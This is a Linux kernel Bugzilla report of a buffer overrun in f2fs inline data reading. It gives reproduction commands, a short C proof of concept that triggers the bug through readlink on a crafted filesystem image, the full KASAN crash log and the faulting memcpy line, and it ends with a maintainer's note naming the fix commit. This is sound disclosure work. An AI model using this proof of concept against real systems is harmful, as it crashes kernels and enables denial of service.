Bug 200219 - Buffer overrun when reading inline data in f2fs
Summary: Buffer overrun when reading inline data in f2fs
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: f2fs (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: Default virtual assignee for f2fs
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-23 04:39 UTC by Wen Xu
Modified: 2019-07-24 02:54 UTC (History)
2 users (show)

See Also:
Kernel Version: 4.18
Tree: Mainline
Regression: No


Attachments
The (compressed) crafted image which causes crash (70.37 KB, application/zip)
2018-06-23 04:39 UTC, Wen Xu
Details

Description Wen Xu 2018-06-23 04:39:02 UTC
Created attachment 276757 [details]
The (compressed) crafted image which causes crash

- Overview
Buffer overrun when reading inline data in f2fs 

- Reproduce
# mkdir mnt
# mount -t f2fs 59.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *sln;
  int err;

  err = asprintf(&sln, "%s/foo/bar/sln", mpoint);

  char buf2[1024];
  readlink(sln, buf2, sizeof(buf2));

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  548.329372] F2FS-fs (loop0): Can't find valid F2FS filesystem in 2th superblock
[  554.515450] ==================================================================
[  554.516977] BUG: KASAN: out-of-bounds in f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.518397] Read of size 18446744073709513216 at addr ffff8801f42ab50c by task poc/1310
[  554.520066]
[  554.520710]
[  554.521037] The buggy address belongs to the page:
[  554.522002] page:ffffea0007d0aac0 count:1 mapcount:0 mapping:0000000000000000 index:0x0
[  554.523594] flags: 0x2ffff0000000000()
[  554.524362] raw: 02ffff0000000000 dead000000000100 dead000000000200 0000000000000000
[  554.525888] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[  554.527415] page dumped because: kasan: bad access detected
[  554.528535]
[  554.528852] Memory state around the buggy address:
[  554.529820]  ffff8801f42ab400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.531252]  ffff8801f42ab480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.532700] >ffff8801f42ab500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.534126]                       ^
[  554.534832]  ffff8801f42ab580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.536276]  ffff8801f42ab600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.537698] ==================================================================
[  554.539430] BUG: unable to handle kernel paging request at ffff8801eebe9000
[  554.540854] PGD 911ba067 P4D 911ba067 PUD 911c1067 PMD 1f3fb4063 PTE 80000001eebe9061
[  554.542431] Oops: 0003 [#1] SMP KASAN PTI
[  554.543253] CPU: 0 PID: 1310 Comm: poc Tainted: G    B             4.18.0-rc1+ #4
[  554.544746] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.546623] RIP: 0010:__memcpy+0x12/0x20
[  554.547409] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.571413] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.572474] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.573878] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.575283] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.576696] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.578099] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.579515] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.581152] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.582316] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.583750] Call Trace:
[  554.584264]  ? memcpy+0x45/0x50
[  554.584910]  f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.585853]  f2fs_read_inline_data+0x99/0x300
[  554.586745]  f2fs_read_data_page+0xed/0x110
[  554.587609]  do_read_cache_page+0x476/0x780
[  554.588463]  ? f2fs_read_data_pages+0x100/0x100
[  554.589381]  ? trailing_symlink+0x3b0/0x3b0
[  554.590232]  ? pagecache_get_page+0x2f0/0x2f0
[  554.591113]  ? putname+0x80/0x90
[  554.591787]  ? __kasan_slab_free+0x151/0x1a0
[  554.592654]  ? putname+0x80/0x90
[  554.593320]  ? kasan_slab_free+0xe/0x10
[  554.594105]  ? kmem_cache_free+0x89/0x1e0
[  554.594923]  ? putname+0x80/0x90
[  554.595596]  ? filename_lookup+0x191/0x280
[  554.596431]  ? f2fs_read_data_pages+0x100/0x100
[  554.597340]  read_cache_page+0x40/0x50
[  554.598100]  page_get_link+0x5d/0x1b0
[  554.598843]  f2fs_get_link+0x14/0x70
[  554.599578]  vfs_readlink+0x171/0x240
[  554.600322]  ? readlink_copy+0x50/0x50
[  554.601096]  do_readlinkat+0x1e3/0x210
[  554.601861]  ? __x32_compat_sys_newfstat+0x40/0x40
[  554.602833]  ? setxattr+0x260/0x260
[  554.603596]  ? removexattr+0xf0/0xf0
[  554.604329]  __x64_sys_readlink+0x48/0x60
[  554.605146]  do_syscall_64+0x78/0x170
[  554.605897]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  554.606913] RIP: 0033:0x7f4fe4946a37
[  554.607641] Code: 73 01 c3 48 8b 0d 61 b4 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 b8 59 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 31 b4 2c 00 f7 d8 64 89 01 48
[  554.611357] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.612863] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.614268] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.615700] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.617110] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.618514] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.619938] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.629596] CR2: ffff8801eebe9000
[  554.630278] ---[ end trace 4ce02f25ff7d3df5 ]---
[  554.631214] RIP: 0010:__memcpy+0x12/0x20
[  554.632026] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.635762] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.636808] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.638210] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.639626] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.641056] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.642464] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.643885] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.645474] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.646611] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.648461] BUG: unable to handle kernel paging request at 000004b2ffffffff
[  554.649875] PGD 0 P4D 0
[  554.650404] Oops: 0000 [#2] SMP KASAN PTI
[  554.651226] CPU: 0 PID: 1310 Comm: poc Tainted: G    B D           4.18.0-rc1+ #4
[  554.652768] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.654663] RIP: 0010:map_id_up+0x85/0x1f0
[  554.655489] Code: ff ff c7 00 f1 f1 f1 f1 c7 40 04 00 04 f4 f4 c7 40 08 f3 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 45 d0 31 c0 e8 1b 7a 1a 00 <8b> 03 89 85 74 ff ff ff 83 f8 05 0f 87 07 01 00 00 85 c0 0f 84 f8
[  554.667336] RSP: 0018:ffff8801e0ef7bd0 EFLAGS: 00010096
[  554.668390] RAX: 0000000000000000 RBX: 000004b2ffffffff RCX: ffffffffb81f5cb5
[  554.669789] RDX: 0000000000000000 RSI: 0000000000000004 RDI: 000004b2ffffffff
[  554.671191] RBP: ffff8801e0ef7c70 R08: ffffed003c1defb0 R09: ffff8801e0ef7d00
[  554.672602] R10: 0000000000000010 R11: ffffed003c1defaf R12: 0000000000000000
[  554.674016] R13: 0000000000000011 R14: ffff8801f2676040 R15: 1ffff1003c1def7d
[  554.675416] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.677012] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.678151] CR2: 000004b2ffffffff CR3: 000000009000e000 CR4: 00000000000006f0
[  554.679562] Call Trace:
[  554.680074]  ? make_kprojid+0x20/0x20
[  554.680819]  from_kuid_munged+0x28/0x50
[  554.681604]  do_notify_parent+0x1f5/0x4f0
[  554.682417]  ? send_sigqueue+0x390/0x390
[  554.683212]  ? css_set_move_task+0x152/0x340
[  554.684096]  ? will_become_orphaned_pgrp+0x11c/0x160
[  554.685092]  do_exit+0x1290/0x1390
[  554.685786]  ? mm_update_next_owner+0x380/0x380
[  554.686696]  ? setxattr+0x260/0x260
[  554.687406]  ? removexattr+0xf0/0xf0
[  554.688153]  ? __x64_sys_readlink+0x48/0x60
[  554.689007]  rewind_stack_do_exit+0x17/0x20
[  554.689849] RIP: 0033:0x7f4fe4946a37
[  554.690568] Code: Bad RIP value.
[  554.691241] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.692755] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.694190] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.695621] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.697040] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.698445] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.699872] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.709208] CR2: 000004b2ffffffff
[  554.709876] ---[ end trace 4ce02f25ff7d3df6 ]---
[  554.710809] RIP: 0010:__memcpy+0x12/0x20
[  554.711610] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.715325] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.716369] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.717775] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.719182] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.720597] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.722005] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.723407] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.725017] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.726151] CR2: 00007f4fe4946a0d CR3: 000000009000e000 CR4: 00000000000006f0
[  554.727572] Fixing recursive fault but reboot is needed!

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/f2fs/inline.c#L60
	memcpy(dst_addr, src_addr, MAX_INLINE_DATA(inode));
Based on KASAN report, there is buffer overrun in this memcpy()

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab, Gatech.
Comment 1 Chao Yu 2019-07-24 02:54:13 UTC
Should have been fixed with below commit:

042be0f849e5 ("f2fs: fix to do sanity check with current segment number")

To Wen Xu, let me know if you have further question about this.

Note You need to log in before you can comment on or make changes to this bug.